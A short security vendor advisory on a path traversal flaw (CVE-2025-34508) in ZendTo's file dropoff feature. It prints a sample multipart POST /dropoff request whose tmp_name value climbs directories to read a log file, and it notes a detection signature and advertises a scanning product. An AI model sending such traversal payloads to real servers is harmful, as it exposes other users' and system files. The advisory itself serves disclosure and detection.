top of page
Search

ZendTo 'dropoff' - Path Traversal (CVE-2025-34508)



Application Details

ZendTo is an open-source, web-based tool commonly used by universities, research institutions, and enterprises to securely exchange large files with external users.


Vulnerability

A path traversal vulnerability exists in the file dropoff functionality of ZendTo versions 6.15-7 and prior.


Identification

This could allow a remote, authenticated attacker to retrieve the files of other ZendTo users, retrieve files on the host system, or cause a denial of service.


POST /dropoff

--------------------------d74496d66958873e
Content-Disposition: form-data; name="Action"

dropoff
--------------------------d74496d66958873e
Content-Disposition: form-data; name="chunkname"

.
--------------------------d74496d66958873e
Content-Disposition: form-data; name="file_1"

{"name":"zendto.log","type":"","size":"unused","tmp_name":"/../../log/zendto.log","error":0}
--------------------------d74496d66958873e
Detection

By turning this into a traffic file and matching rule, we are able to detect directory traversal attempts by an unauthenticated remote attacker.


Coverage

Idappcom have created signature 8026071 along with a traffic file for this vulnerability.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

 
 
 

Comments


bottom of page